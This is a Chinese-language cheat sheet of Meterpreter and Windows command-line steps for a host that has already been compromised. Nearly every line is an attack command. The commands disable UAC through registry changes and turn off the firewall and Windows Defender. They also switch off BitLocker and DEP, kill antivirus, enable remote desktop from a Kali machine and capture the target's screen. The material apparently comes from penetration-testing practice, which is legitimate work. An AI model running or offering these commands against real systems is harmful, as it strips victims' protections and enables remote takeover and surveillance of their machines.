关闭UAC
meterpreter > shell
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
C:\Windows\system32>shutdown /r /t 0 有时可能需要重启才能生效
C:\Windows\system32>netsh advfirewall set allprofiles state off 关闭防火墙
C:\Windows\system32>net stop windefend 关闭Windows Defender服务
C:\Windows\system32>manage-bde -status C: 查看C盘Bitlocker状态
C:\Windows\system32>manage-bde -off C: 关闭Bitlocker磁盘加密
C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff 关闭DEP
meterpreter > run post/windows/manage/killav 关闭杀毒软件
远程桌面
meterpreter > run post/windows/manage/enable_rdp 开启远程桌面
root@kali:~# rdesktop 192.168.80.33 在Kali上连接目标主机
meterpreter > run multi_console_command -r /root/.msf4/loot/20170407110920_default_192.168.80.33_host.windows.cle_874214.txt 关闭远程桌面
meterpreter > screenshot 截图目标主机
meterpreter > load espia
meterpreter > screengrab 截图目标主机
